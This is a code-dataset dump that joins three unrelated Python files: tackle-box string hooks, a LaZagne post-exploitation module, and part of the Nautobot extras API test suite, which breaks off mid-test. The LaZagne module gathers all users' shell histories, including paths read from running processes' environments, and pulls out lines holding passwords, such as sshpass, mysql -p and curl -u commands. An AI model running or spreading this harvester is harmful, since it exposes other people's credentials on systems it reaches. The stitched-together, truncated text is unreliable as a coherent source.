geometry-labs/tackle-box
|
83424a10416955ba983f0c14ec89bd79673a4282
|
[
"BSD-3-Clause"
] | 4
|
2021-01-27T00:06:12.000Z
|
2021-02-12T01:20:32.000Z
|
tackle/providers/system/hooks/strings.py
|
geometry-labs/tackle-box
|
83424a10416955ba983f0c14ec89bd79673a4282
|
[
"BSD-3-Clause"
] | 1
|
2021-05-07T05:07:29.000Z
|
2021-05-07T05:07:29.000Z
|
"""String hooks."""
import logging
from typing import List
from tackle.models import BaseHook, Field
logger = logging.getLogger(__name__)
class SplitHook(BaseHook):
"""Hook for splitting a string into as list based on a separator."""
hook_type: str = 'split'
input: str = Field(..., description="A list of string to split or just a string")
separator: str = Field(".", description="String separator")
_args: list = ['input']
def execute(self):
return self.input.split(self.separator)
class JoinHook(BaseHook):
"""Join a list of strings with a separator."""
hook_type: str = 'join'
input: List[str] = Field(
..., description="A list of strings to join.", render_by_default=True
)
separator: str = Field('.', description="String separator.")
_args: list = ['input']
def execute(self):
return self.separator.join(self.input)
| 25.277778
| 85
| 0.659341
|
4a0f4a838168457f5e478cc830fedc5a84789ff6
| 3,852
|
py
|
Python
|
Post-Exploitation/LaZagne/Linux/lazagne/softwares/sysadmin/cli.py
|
FOGSEC/TID3xploits
|
b57d8bae454081a3883a5684679e2a329e72d6e5
|
[
"MIT"
] | 5
|
2018-01-15T13:58:40.000Z
|
2022-02-17T02:38:58.000Z
|
Post-Exploitation/LaZagne/Linux/lazagne/softwares/sysadmin/cli.py
|
bhattsameer/TID3xploits
|
b57d8bae454081a3883a5684679e2a329e72d6e5
|
[
"MIT"
] | null | null | null |
Post-Exploitation/LaZagne/Linux/lazagne/softwares/sysadmin/cli.py
|
bhattsameer/TID3xploits
|
b57d8bae454081a3883a5684679e2a329e72d6e5
|
[
"MIT"
] | 4
|
2019-06-21T07:51:11.000Z
|
2020-11-04T05:20:09.000Z
|
from lazagne.config.constant import *
from lazagne.config.write_output import print_debug
from lazagne.config.moduleInfo import ModuleInfo
from lazagne.config import homes
from ConfigParser import ConfigParser
import psutil
import os
import pwd
class Cli(ModuleInfo):
def __init__(self):
options = {'command': '-C', 'action': 'store_true', 'dest': 'cli', 'help': 'cli'}
suboptions = []
ModuleInfo.__init__(self, 'cli', 'sysadmin', options, suboptions)
def get_files(self):
known = set()
for user, histfile in homes.users(file=['.history', '.sh_history', '.bash_history', '.zhistory']):
yield user, histfile
known.add(histfile)
for process in psutil.process_iter():
try:
environ = process.environ()
user = process.username()
except:
continue
if not 'HISTFILE' in environ:
continue
histfile = environ['HISTFILE']
if histfile in ('/dev/zero', '/dev/null'):
continue
if histfile.startswith('~/'):
try:
home = pwd.getpwuid(process.uids().effective).pw_dir
except:
continue
histfile = os.path.join(home, histfile[2:])
if os.path.isfile(histfile) and not histfile in known:
yield user, histfile
known.add(histfile)
def get_lines(self):
known = set()
for user, plainfile in self.get_files():
try:
with open(plainfile) as infile:
for line in infile.readlines():
line = line.strip()
if line.startswith('#'):
continue
try:
int(line)
continue
except:
pass
line = ' '.join(x for x in line.split() if x)
if not line in known:
yield user, line
known.add(line)
except:
pass
for user, histfile in homes.users(file='.local/share/mc/history'):
parser = ConfigParser()
try:
parser.read(histfile)
except:
continue
try:
for i in parser.options('cmdline'):
line = parser.get('cmdline', i)
if not line in known:
yield user, line
known.add(line)
except:
pass
def suspicious(self, user, line):
markers = [
('sshpass', '-p'),
('chpasswd',),
('openssl', 'passwd'),
('sudo', '-S'),
('mysql', '-p'),
('psql', 'postgresql://'),
('pgcli', 'postgresql://'),
('ssh', '-i'),
('sqlplus', '/'),
('xfreerdp', '/p'),
('vncviewer', 'passwd'),
('vncviewer', 'PasswordFile'),
('mount.cifs', 'credentials'),
('pass=',),
('smbclient',),
('ftp', '@'),
('wget', '@'),
('curl', '@'),
('curl', '-u'),
('wget', '-password')
]
for marker in markers:
if all((x in line) for x in marker):
yield {
'User': user,
'Cmd': line
}
def run(self, software_name=None):
all_cmds = []
for user, line in self.get_lines():
for cmd in self.suspicious(user, line):
all_cmds.append(cmd)
return all_cmds
| 30.816
| 106
| 0.438474
|
4a0f4aa8bf0510d95032cd3be17a7d6082405463
| 67,168
|
py
|
Python
|
nautobot/extras/tests/test_api.py
|
psmware-ltd/nautobot
|
ac516287fb8edcc3482bd011839de837c6bbf0df
|
[
"Apache-2.0"
] | 384
|
2021-02-24T01:40:40.000Z
|
2022-03-30T10:30:59.000Z
|
nautobot/extras/tests/test_api.py
|
psmware-ltd/nautobot
|
ac516287fb8edcc3482bd011839de837c6bbf0df
|
[
"Apache-2.0"
] | 1,067
|
2021-02-24T00:58:08.000Z
|
2022-03-31T23:38:23.000Z
|
nautobot/extras/tests/test_api.py
|
psmware-ltd/nautobot
|
ac516287fb8edcc3482bd011839de837c6bbf0df
|
[
"Apache-2.0"
] | 128
|
2021-02-24T02:45:16.000Z
|
2022-03-20T18:48:36.000Z
|
from datetime import datetime, timedelta
import os.path
import uuid
from unittest import mock, skipIf
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.contenttypes.models import ContentType
from django.http import Http404
from django.test import override_settings
from django.urls import reverse
from django.utils.timezone import make_aware, now
from rest_framework import status
from nautobot.dcim.models import (
Device,
DeviceRole,
DeviceType,
Manufacturer,
Rack,
RackGroup,
RackRole,
Site,
)
from nautobot.extras.api.views import JobViewSet
from nautobot.extras.choices import JobExecutionType, SecretsGroupAccessTypeChoices, SecretsGroupSecretTypeChoices
from nautobot.extras.models import (
ComputedField,
ConfigContext,
ConfigContextSchema,
CustomField,
CustomLink,
ExportTemplate,
GitRepository,
GraphQLQuery,
ImageAttachment,
JobLogEntry,
JobResult,
Relationship,
RelationshipAssociation,
ScheduledJob,
Secret,
SecretsGroup,
SecretsGroupAssociation,
Status,
Tag,
Webhook,
)
from nautobot.extras.jobs import Job, BooleanVar, IntegerVar, StringVar, ObjectVar
from nautobot.utilities.testing import APITestCase, APIViewTestCases
from nautobot.utilities.testing.utils import disable_warnings
User = get_user_model()
THIS_DIRECTORY = os.path.dirname(__file__)
class AppTest(APITestCase):
def test_root(self):
url = reverse("extras-api:api-root")
response = self.client.get("{}?format=api".format(url), **self.header)
self.assertEqual(response.status_code, 200)
#
# Computed Fields
#
class ComputedFieldTest(APIViewTestCases.APIViewTestCase):
model = ComputedField
brief_fields = [
"content_type",
"description",
"display",
"fallback_value",
"id",
"label",
"slug",
"template",
"url",
"weight",
]
create_data = [
{
"content_type": "dcim.site",
"slug": "cf4",
"label": "Computed Field 4",
"template": "{{ obj.name }}",
"fallback_value": "error",
},
{
"content_type": "dcim.site",
"slug": "cf5",
"label": "Computed Field 5",
"template": "{{ obj.name }}",
"fallback_value": "error",
},
{
"content_type": "dcim.site",
"slug": "cf6",
"label": "Computed Field 6",
"template": "{{ obj.name }}",
},
{
"content_type": "dcim.site",
"label": "Computed Field 7",
"template": "{{ obj.name }}",
"fallback_value": "error",
},
]
update_data = {
"content_type": "dcim.site",
"slug": "cf1",
"label": "My Computed Field",
}
bulk_update_data = {
"description": "New description",
}
slug_source = "label"
@classmethod
def setUpTestData(cls):
site_ct = ContentType.objects.get_for_model(Site)
ComputedField.objects.create(
slug="cf1",
label="Computed Field One",
template="{{ obj.name }}",
fallback_value="error",
content_type=site_ct,
),
ComputedField.objects.create(
slug="cf2",
label="Computed Field Two",
template="{{ obj.name }}",
fallback_value="error",
content_type=site_ct,
),
ComputedField.objects.create(
slug="cf3",
label="Computed Field Three",
template="{{ obj.name }}",
fallback_value="error",
content_type=site_ct,
)
cls.site = Site.objects.create(name="Site 1", slug="site-1")
def test_computed_field_include(self):
"""Test that explicitly including a computed field behaves as expected."""
self.add_permissions("dcim.view_site")
url = reverse("dcim-api:site-detail", kwargs={"pk": self.site.pk})
# First get the object without computed fields.
response = self.client.get(url, **self.header)
self.assertNotIn("computed_fields", response.json())
# Now get it with computed fields.
params = {"include": "computed_fields"}
response = self.client.get(url, data=params, **self.header)
self.assertIn("computed_fields", response.json())
class ConfigContextTest(APIViewTestCases.APIViewTestCase):
model = ConfigContext
brief_fields = ["display", "id", "name", "url"]
create_data = [
{
"name": "Config Context 4",
"data": {"more_foo": True},
},
{
"name": "Config Context 5",
"data": {"more_bar": False},
},
{
"name": "Config Context 6",
"data": {"more_baz": None},
},
]
bulk_update_data = {
"description": "New description",
}
@classmethod
def setUpTestData(cls):
ConfigContext.objects.create(name="Config Context 1", weight=100, data={"foo": 123})
ConfigContext.objects.create(name="Config Context 2", weight=200, data={"bar": 456})
ConfigContext.objects.create(name="Config Context 3", weight=300, data={"baz": 789})
def test_render_configcontext_for_object(self):
"""
Test rendering config context data for a device.
"""
manufacturer = Manufacturer.objects.create(name="Manufacturer 1", slug="manufacturer-1")
devicetype = DeviceType.objects.create(manufacturer=manufacturer, model="Device Type 1", slug="device-type-1")
devicerole = DeviceRole.objects.create(name="Device Role 1", slug="device-role-1")
site = Site.objects.create(name="Site-1", slug="site-1")
device = Device.objects.create(name="Device 1", device_type=devicetype, device_role=devicerole, site=site)
# Test default config contexts (created at test setup)
rendered_context = device.get_config_context()
self.assertEqual(rendered_context["foo"], 123)
self.assertEqual(rendered_context["bar"], 456)
self.assertEqual(rendered_context["baz"], 789)
# Add another context specific to the site
configcontext4 = ConfigContext(name="Config Context 4", data={"site_data": "ABC"})
configcontext4.save()
configcontext4.sites.add(site)
rendered_context = device.get_config_context()
self.assertEqual(rendered_context["site_data"], "ABC")
# Override one of the default contexts
configcontext5 = ConfigContext(name="Config Context 5", weight=2000, data={"foo": 999})
configcontext5.save()
configcontext5.sites.add(site)
rendered_context = device.get_config_context()
self.assertEqual(rendered_context["foo"], 999)
# Add a context which does NOT match our device and ensure it does not apply
site2 = Site.objects.create(name="Site 2", slug="site-2")
configcontext6 = ConfigContext(name="Config Context 6", weight=2000, data={"bar": 999})
configcontext6.save()
configcontext6.sites.add(site2)
rendered_context = device.get_config_context()
self.assertEqual(rendered_context["bar"], 456)
def test_schema_validation_pass(self):
"""
Given a config context schema
And a config context that conforms to that schema
Assert that the config context passes schema validation via full_clean()
"""
schema = ConfigContextSchema.objects.create(
name="Schema 1", slug="schema-1", data_schema={"type": "object", "properties": {"foo": {"type": "string"}}}
)
self.add_permissions("extras.add_configcontext")
data = {"name": "Config Context with schema", "weight": 100, "data": {"foo": "bar"}, "schema": str(schema.pk)}
response = self.client.post(self._get_list_url(), data, format="json", **self.header)
self.assertHttpStatus(response, status.HTTP_201_CREATED)
self.assertEqual(response.data["schema"]["id"], str(schema.pk))
def test_schema_validation_fails(self):
"""
Given a config context schema
And a config context that *does not* conform to that schema
Assert that the config context fails schema validation via full_clean()
"""
schema = ConfigContextSchema.objects.create(
name="Schema 1", slug="schema-1", data_schema={"type": "object", "properties": {"foo": {"type": "integer"}}}
)
self.add_permissions("extras.add_configcontext")
data = {
"name": "Config Context with bad schema",
"weight": 100,
"data": {"foo": "bar"},
"schema": str(schema.pk),
}
response = self.client.post(self._get_list_url(), data, format="json", **self.header)
self.assertHttpStatus(response, status.HTTP_400_BAD_REQUEST)
class ConfigContextSchemaTest(APIViewTestCases.APIViewTestCase):
model = ConfigContextSchema
brief_fields = ["display", "id", "name", "slug", "url"]
create_data = [
{
"name": "Schema 4",
"slug": "schema-4",
"data_schema": {"type": "object", "properties": {"foo": {"type": "string"}}},
},
{
"name": "Schema 5",
"slug": "schema-5",
"data_schema": {"type": "object", "properties": {"bar": {"type": "string"}}},
},
{
"name": "Schema 6",
"slug": "schema-6",
"data_schema": {"type": "object", "properties": {"buz": {"type": "string"}}},
},
{
"name": "Schema 7",
"data_schema": {"type": "object", "properties": {"buz": {"type": "string"}}},
},
]
bulk_update_data = {
"description": "New description",
}
choices_fields = []
slug_source = "name"
@classmethod
def setUpTestData(cls):
ConfigContextSchema.objects.create(
name="Schema 1", slug="schema-1", data_schema={"type": "object", "properties": {"foo": {"type": "string"}}}
),
ConfigContextSchema.objects.create(
name="Schema 2", slug="schema-2", data_schema={"type": "object", "properties": {"bar": {"type": "string"}}}
),
ConfigContextSchema.objects.create(
name="Schema 3", slug="schema-3", data_schema={"type": "object", "properties": {"baz": {"type": "string"}}}
),
class ContentTypeTest(APITestCase):
@override_settings(EXEMPT_VIEW_PERMISSIONS=["contenttypes.contenttype"])
def test_list_objects(self):
contenttype_count = ContentType.objects.count()
response = self.client.get(reverse("extras-api:contenttype-list"), **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(response.data["count"], contenttype_count)
@override_settings(EXEMPT_VIEW_PERMISSIONS=["contenttypes.contenttype"])
def test_get_object(self):
contenttype = ContentType.objects.first()
url = reverse("extras-api:contenttype-detail", kwargs={"pk": contenttype.pk})
self.assertHttpStatus(self.client.get(url, **self.header), status.HTTP_200_OK)
class CreatedUpdatedFilterTest(APITestCase):
def setUp(self):
super().setUp()
self.site1 = Site.objects.create(name="Test Site 1", slug="test-site-1")
self.rackgroup1 = RackGroup.objects.create(site=self.site1, name="Test Rack Group 1", slug="test-rack-group-1")
self.rackrole1 = RackRole.objects.create(name="Test Rack Role 1", slug="test-rack-role-1", color="ff0000")
self.rack1 = Rack.objects.create(
site=self.site1,
group=self.rackgroup1,
role=self.rackrole1,
name="Test Rack 1",
u_height=42,
)
self.rack2 = Rack.objects.create(
site=self.site1,
group=self.rackgroup1,
role=self.rackrole1,
name="Test Rack 2",
u_height=42,
)
# change the created and last_updated of one
Rack.objects.filter(pk=self.rack2.pk).update(
last_updated=make_aware(datetime(2001, 2, 3, 1, 2, 3, 4)),
created=make_aware(datetime(2001, 2, 3)),
)
def test_get_rack_created(self):
self.add_permissions("dcim.view_rack")
url = reverse("dcim-api:rack-list")
response = self.client.get("{}?created=2001-02-03".format(url), **self.header)
self.assertEqual(response.data["count"], 1)
self.assertEqual(response.data["results"][0]["id"], str(self.rack2.pk))
def test_get_rack_created_gte(self):
self.add_permissions("dcim.view_rack")
url = reverse("dcim-api:rack-list")
response = self.client.get("{}?created__gte=2001-02-04".format(url), **self.header)
self.assertEqual(response.data["count"], 1)
self.assertEqual(response.data["results"][0]["id"], str(self.rack1.pk))
def test_get_rack_created_lte(self):
self.add_permissions("dcim.view_rack")
url = reverse("dcim-api:rack-list")
response = self.client.get("{}?created__lte=2001-02-04".format(url), **self.header)
self.assertEqual(response.data["count"], 1)
self.assertEqual(response.data["results"][0]["id"], str(self.rack2.pk))
def test_get_rack_last_updated(self):
self.add_permissions("dcim.view_rack")
url = reverse("dcim-api:rack-list")
response = self.client.get("{}?last_updated=2001-02-03%2001:02:03.000004".format(url), **self.header)
self.assertEqual(response.data["count"], 1)
self.assertEqual(response.data["results"][0]["id"], str(self.rack2.pk))
def test_get_rack_last_updated_gte(self):
self.add_permissions("dcim.view_rack")
url = reverse("dcim-api:rack-list")
response = self.client.get("{}?last_updated__gte=2001-02-04%2001:02:03.000004".format(url), **self.header)
self.assertEqual(response.data["count"], 1)
self.assertEqual(response.data["results"][0]["id"], str(self.rack1.pk))
def test_get_rack_last_updated_lte(self):
self.add_permissions("dcim.view_rack")
url = reverse("dcim-api:rack-list")
response = self.client.get("{}?last_updated__lte=2001-02-04%2001:02:03.000004".format(url), **self.header)
self.assertEqual(response.data["count"], 1)
self.assertEqual(response.data["results"][0]["id"], str(self.rack2.pk))
class CustomFieldTest(APIViewTestCases.APIViewTestCase):
model = CustomField
brief_fields = ["display", "id", "name", "url"]
create_data = [
{
"content_types": ["dcim.site"],
"name": "cf4",
"type": "date",
},
{
"content_types": ["dcim.site"],
"name": "cf5",
"type": "url",
},
{
"content_types": ["dcim.site"],
"name": "cf6",
"type": "select",
},
]
update_data = {
"content_types": ["dcim.site"],
"name": "cf1",
"label": "foo",
}
bulk_update_data = {
"description": "New description",
}
choices_fields = ["filter_logic", "type"]
@classmethod
def setUpTestData(cls):
site_ct = ContentType.objects.get_for_model(Site)
custom_fields = (
CustomField.objects.create(name="cf1", type="text"),
CustomField.objects.create(name="cf2", type="integer"),
CustomField.objects.create(name="cf3", type="boolean"),
)
for cf in custom_fields:
cf.content_types.add(site_ct)
class CustomLinkTest(APIViewTestCases.APIViewTestCase):
model = CustomLink
brief_fields = ["content_type", "display", "id", "name", "url"]
create_data = [
{
"content_type": "dcim.site",
"name": "api-test-4",
"text": "API customlink text 4",
"target_url": "http://api-test-4.com/test4",
"weight": 100,
"new_window": False,
},
{
"content_type": "dcim.site",
"name": "api-test-5",
"text": "API customlink text 5",
"target_url": "http://api-test-5.com/test5",
"weight": 100,
"new_window": False,
},
{
"content_type": "dcim.site",
"name": "api-test-6",
"text": "API customlink text 6",
"target_url": "http://api-test-6.com/test6",
"weight": 100,
"new_window": False,
},
]
choices_fields = ["button_class"]
@classmethod
def setUpTestData(cls):
obj_type = ContentType.objects.get_for_model(Site)
CustomLink.objects.create(
content_type=obj_type,
name="api-test-1",
text="API customlink text 1",
target_url="http://api-test-1.com/test1",
weight=100,
new_window=False,
)
CustomLink.objects.create(
content_type=obj_type,
name="api-test-2",
text="API customlink text 2",
target_url="http://api-test-2.com/test2",
weight=100,
new_window=False,
)
CustomLink.objects.create(
content_type=obj_type,
name="api-test-3",
text="API customlink text 3",
target_url="http://api-test-3.com/test3",
weight=100,
new_window=False,
)
class ExportTemplateTest(APIViewTestCases.APIViewTestCase):
model = ExportTemplate
brief_fields = ["display", "id", "name", "url"]
create_data = [
{
"content_type": "dcim.device",
"name": "Test Export Template 4",
"template_code": "{% for obj in queryset %}{{ obj.name }}\n{% endfor %}",
},
{
"content_type": "dcim.device",
"name": "Test Export Template 5",
"template_code": "{% for obj in queryset %}{{ obj.name }}\n{% endfor %}",
},
{
"content_type": "dcim.device",
"name": "Test Export Template 6",
"template_code": "{% for obj in queryset %}{{ obj.name }}\n{% endfor %}",
},
]
bulk_update_data = {
"description": "New description",
}
choices_fields = ["owner_content_type", "content_type"]
@classmethod
def setUpTestData(cls):
ct = ContentType.objects.get_for_model(Device)
ExportTemplate.objects.create(
content_type=ct,
name="Export Template 1",
template_code="{% for obj in queryset %}{{ obj.name }}\n{% endfor %}",
)
ExportTemplate.objects.create(
content_type=ct,
name="Export Template 2",
template_code="{% for obj in queryset %}{{ obj.name }}\n{% endfor %}",
)
ExportTemplate.objects.create(
content_type=ct,
name="Export Template 3",
template_code="{% for obj in queryset %}{{ obj.name }}\n{% endfor %}",
)
# Override the JOB_LOGS to None so that the Log Objects are created in the default database.
# This change is required as JOB_LOGS is a `fake` database pointed at the default. The django
# database cleanup will fail and cause tests to fail as this is not a real database.
@mock.patch("nautobot.extras.models.models.JOB_LOGS", None)
class GitRepositoryTest(APIViewTestCases.APIViewTestCase):
model = GitRepository
brief_fields = ["display", "id", "name", "url"]
bulk_update_data = {
"branch": "develop",
}
choices_fields = ["provided_contents"]
slug_source = "name"
@classmethod
def setUpTestData(cls):
secrets_groups = (
SecretsGroup.objects.create(name="Secrets Group 1", slug="secrets-group-1"),
SecretsGroup.objects.create(name="Secrets Group 2", slug="secrets-group-2"),
)
cls.repos = (
GitRepository(
name="Repo 1",
slug="repo-1",
remote_url="https://example.com/repo1.git",
secrets_group=secrets_groups[0],
),
GitRepository(
name="Repo 2",
slug="repo-2",
remote_url="https://example.com/repo2.git",
secrets_group=secrets_groups[0],
),
GitRepository(name="Repo 3", slug="repo-3", remote_url="https://example.com/repo3.git"),
)
for repo in cls.repos:
repo.save(trigger_resync=False)
cls.create_data = [
{
"name": "New Git Repository 1",
"slug": "new-git-repository-1",
"remote_url": "https://example.com/newrepo1.git",
"secrets_group": secrets_groups[1].pk,
},
{
"name": "New Git Repository 2",
"slug": "new-git-repository-2",
"remote_url": "https://example.com/newrepo2.git",
"secrets_group": secrets_groups[1].pk,
},
{
"name": "New Git Repository 3",
"slug": "new-git-repository-3",
"remote_url": "https://example.com/newrepo3.git",
"secrets_group": secrets_groups[1].pk,
},
{
"name": "New Git Repository 4",
"remote_url": "https://example.com/newrepo3.git",
"secrets_group": secrets_groups[1].pk,
},
]
@override_settings(EXEMPT_VIEW_PERMISSIONS=[])
@mock.patch("nautobot.extras.api.views.get_worker_count")
def test_run_git_sync_no_celery_worker(self, mock_get_worker_count):
"""Git sync cannot be triggered if Celery is not running."""
mock_get_worker_count.return_value = 0
self.add_permissions("extras.add_gitrepository")
self.add_permissions("extras.change_gitrepository")
url = reverse("extras-api:gitrepository-sync", kwargs={"pk": self.repos[0].id})
response = self.client.post(url, format="json", **self.header)
self.assertHttpStatus(response, status.HTTP_503_SERVICE_UNAVAILABLE)
self.assertEqual(response.data["detail"], "Unable to process request: Celery worker process not running.")
@override_settings(EXEMPT_VIEW_PERMISSIONS=[])
@mock.patch("nautobot.extras.api.views.get_worker_count")
def test_run_git_sync_nonexistent_repo(self, mock_get_worker_count):
"""Git sync request handles case of a nonexistent repository."""
mock_get_worker_count.return_value = 1
self.add_permissions("extras.add_gitrepository")
self.add_permissions("extras.change_gitrepository")
url = reverse("extras-api:gitrepository-sync", kwargs={"pk": "11111111-1111-1111-1111-111111111111"})
response = self.client.post(url, format="json", **self.header)
self.assertHttpStatus(response, status.HTTP_404_NOT_FOUND)
@override_settings(EXEMPT_VIEW_PERMISSIONS=[])
@mock.patch("nautobot.extras.api.views.get_worker_count")
def test_run_git_sync_without_permissions(self, mock_get_worker_count):
"""Git sync request verifies user permissions."""
mock_get_worker_count.return_value = 1
url = reverse("extras-api:gitrepository-sync", kwargs={"pk": self.repos[0].id})
response = self.client.post(url, format="json", **self.header)
self.assertHttpStatus(response, status.HTTP_403_FORBIDDEN)
@override_settings(EXEMPT_VIEW_PERMISSIONS=[])
@mock.patch("nautobot.extras.api.views.get_worker_count")
def test_run_git_sync_with_permissions(self, mock_get_worker_count):
"""Git sync request can be submitted successfully."""
mock_get_worker_count.return_value = 1
self.add_permissions("extras.add_gitrepository")
self.add_permissions("extras.change_gitrepository")
url = reverse("extras-api:gitrepository-sync", kwargs={"pk": self.repos[0].id})
response = self.client.post(url, format="json", **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
class GraphQLQueryTest(APIViewTestCases.APIViewTestCase):
model = GraphQLQuery
brief_fields = ["display", "id", "name", "url"]
create_data = [
{
"name": "graphql-query-4",
"slug": "graphql-query-4",
"query": "{ query: sites {name} }",
},
{
"name": "graphql-query-5",
"slug": "graphql-query-5",
"query": '{ devices(role: "edge") { id, name, device_role { name slug } } }',
},
{
"name": "Graphql Query 6",
"query": '{ devices(role: "edge") { id, name, device_role { name slug } } }',
},
]
slug_source = "name"
@classmethod
def setUpTestData(cls):
cls.graphqlqueries = (
GraphQLQuery(
name="graphql-query-1",
slug="graphql-query-1",
query="{ sites {name} }",
),
GraphQLQuery(
name="graphql-query-2",
slug="graphql-query-2",
query='{ devices(role: "edge") { id, name, device_role { name slug } } }',
),
GraphQLQuery(
name="graphql-query-3",
slug="graphql-query-3",
query="""
query ($device: [String!]) {
devices(name: $device) {
config_context
name
position
serial
primary_ip4 {
id
primary_ip4_for {
id
name
}
}
tenant {
name
}
tags {
name
slug
}
device_role {
name
}
platform {
name
slug
manufacturer {
name
}
napalm_driver
}
site {
name
slug
vlans {
id
name
vid
}
vlan_groups {
id
}
}
interfaces {
description
mac_address
enabled
name
ip_addresses {
address
tags {
id
}
}
connected_circuit_termination {
circuit {
cid
commit_rate
provider {
name
}
}
}
tagged_vlans {
id
}
untagged_vlan {
id
}
cable {
termination_a_type
status {
name
}
color
}
tagged_vlans {
site {
name
}
id
}
tags {
id
}
}
}
}""",
),
)
for query in cls.graphqlqueries:
query.full_clean()
query.save()
def test_run_saved_query(self):
"""Exercise the /run/ API endpoint."""
self.add_permissions("extras.add_graphqlquery")
self.add_permissions("extras.change_graphqlquery")
self.add_permissions("extras.view_graphqlquery")
url = reverse("extras-api:graphqlquery-run", kwargs={"pk": self.graphqlqueries[0].pk})
response = self.client.post(url, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual({"data": {"sites": []}}, response.data)
url = reverse("extras-api:graphqlquery-run", kwargs={"pk": self.graphqlqueries[2].pk})
response = self.client.post(url, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual({"data": {"devices": []}}, response.data)
# TODO: Standardize to APIViewTestCase (needs create & update tests)
class ImageAttachmentTest(
APIViewTestCases.GetObjectViewTestCase,
APIViewTestCases.ListObjectsViewTestCase,
APIViewTestCases.DeleteObjectViewTestCase,
):
model = ImageAttachment
brief_fields = ["display", "id", "image", "name", "url"]
choices_fields = ["content_type"]
@classmethod
def setUpTestData(cls):
ct = ContentType.objects.get_for_model(Site)
site = Site.objects.create(name="Site 1", slug="site-1")
ImageAttachment.objects.create(
content_type=ct,
object_id=site.pk,
name="Image Attachment 1",
image="http://example.com/image1.png",
image_height=100,
image_width=100,
)
ImageAttachment.objects.create(
content_type=ct,
object_id=site.pk,
name="Image Attachment 2",
image="http://example.com/image2.png",
image_height=100,
image_width=100,
)
ImageAttachment.objects.create(
content_type=ct,
object_id=site.pk,
name="Image Attachment 3",
image="http://example.com/image3.png",
image_height=100,
image_width=100,
)
class JobTest(APITestCase):
class TestJob(Job):
class Meta:
name = "Test job"
var1 = StringVar()
var2 = IntegerVar(required=True) # explicitly stated, though required=True is the default in any case
var3 = BooleanVar()
var4 = ObjectVar(model=DeviceRole)
def run(self, data, commit=True):
self.log_debug(message=data["var1"])
self.log_info(message=data["var2"])
self.log_success(message=data["var3"])
self.log_warning(message=data["var4"])
return "Job complete"
def get_test_job_class(self, class_path):
if class_path == "local/test_api/TestJob":
return self.TestJob
raise Http404
def setUp(self):
super().setUp()
# Monkey-patch the API viewset's _get_job_class method to return our test class above
JobViewSet._get_job_class = self.get_test_job_class
@override_settings(EXEMPT_VIEW_PERMISSIONS=["*"], JOBS_ROOT=THIS_DIRECTORY)
def test_list_jobs_anonymous(self):
url = reverse("extras-api:job-list")
response = self.client.get(url, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
@override_settings(EXEMPT_VIEW_PERMISSIONS=[], JOBS_ROOT=THIS_DIRECTORY)
def test_list_jobs_without_permission(self):
url = reverse("extras-api:job-list")
with disable_warnings("django.request"):
response = self.client.get(url, **self.header)
self.assertHttpStatus(response, status.HTTP_403_FORBIDDEN)
@override_settings(EXEMPT_VIEW_PERMISSIONS=[], JOBS_ROOT=THIS_DIRECTORY)
@skipIf(
"dummy_plugin" not in settings.PLUGINS,
"dummy_plugin not in settings.PLUGINS",
)
def test_list_jobs_with_permission(self):
self.add_permissions("extras.view_job")
url = reverse("extras-api:job-list")
response = self.client.get(url, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
# At a minimum, the job provided by the dummy plugin should be present
self.assertNotEqual(response.data, [])
self.assertIn(
"plugins/dummy_plugin.jobs/DummyJob",
[job["id"] for job in response.data],
)
@override_settings(EXEMPT_VIEW_PERMISSIONS=["*"], JOBS_ROOT=THIS_DIRECTORY)
def test_get_job_anonymous(self):
url = reverse("extras-api:job-detail", kwargs={"class_path": "local/test_api/TestJob"})
response = self.client.get(url, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
@override_settings(EXEMPT_VIEW_PERMISSIONS=[], JOBS_ROOT=THIS_DIRECTORY)
def test_get_job_without_permission(self):
url = reverse("extras-api:job-detail", kwargs={"class_path": "local/test_api/TestJob"})
with disable_warnings("django.request"):
response = self.client.get(url, **self.header)
self.assertHttpStatus(response, status.HTTP_403_FORBIDDEN)
@override_settings(EXEMPT_VIEW_PERMISSIONS=[], JOBS_ROOT=THIS_DIRECTORY)
def test_get_job_with_permission(self):
self.add_permissions("extras.view_job")
# Try GET to permitted object
url = reverse("extras-api:job-detail", kwargs={"class_path": "local/test_api/TestJob"})
response = self.client.get(url, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(response.data["name"], self.TestJob.name)
self.assertEqual(response.data["vars"]["var1"], "StringVar")
self.assertEqual(response.data["vars"]["var2"], "IntegerVar")
self.assertEqual(response.data["vars"]["var3"], "BooleanVar")
# Try GET to non-existent object
url = reverse("extras-api:job-detail", kwargs={"class_path": "local/test_api/NoSuchJob"})
response = self.client.get(url, **self.header)
self.assertHttpStatus(response, status.HTTP_404_NOT_FOUND)
@override_settings(EXEMPT_VIEW_PERMISSIONS=[], JOBS_ROOT=THIS_DIRECTORY)
@mock.patch("nautobot.extras.api.views.get_worker_count")
def test_run_job_without_permission(self, mock_get_worker_count):
"""Job run request enforces user permissions."""
mock_get_worker_count.return_value = 1
url = reverse("extras-api:job-run", kwargs={"class_path": "local/test_api/TestJob"})
with disable_warnings("django.request"):
response = self.client.post(url, {}, format="json", **self.header)
self.assertHttpStatus(response, status.HTTP_403_FORBIDDEN)
@mock.patch("nautobot.extras.api.views.get_worker_count")
def test_run_job_no_worker(self, mock_get_worker_count):
"""Job run cannot be requested if Celery is not running."""
mock_get_worker_count.return_value = 0
self.add_permissions("extras.run_job")
device_role = DeviceRole.objects.create(name="role", slug="role")
job_data = {
"var1": "FooBar",
"var2": 123,
"var3": False,
"var4": device_role.pk,
}
data = {
"data": job_data,
"commit": True,
}
url = reverse("extras-api:job-run", kwargs={"class_path": "local/test_api/TestJob"})
response = self.client.post(url, data, format="json", **self.header)
self.assertHttpStatus(response, status.HTTP_503_SERVICE_UNAVAILABLE)
self.assertEqual(response.data["detail"], "Unable to process request: Celery worker process not running.")
@override_settings(EXEMPT_VIEW_PERMISSIONS=["*"], JOBS_ROOT=THIS_DIRECTORY)
@mock.patch("nautobot.extras.api.views.get_worker_count")
def test_run_job_object_var(self, mock_get_worker_count):
"""Job run requests can reference objects by their primary keys."""
mock_get_worker_count.return_value = 1
self.add_permissions("extras.run_job")
device_role = DeviceRole.objects.create(name="role", slug="role")
job_data = {
"var1": "FooBar",
"var2": 123,
"var3": False,
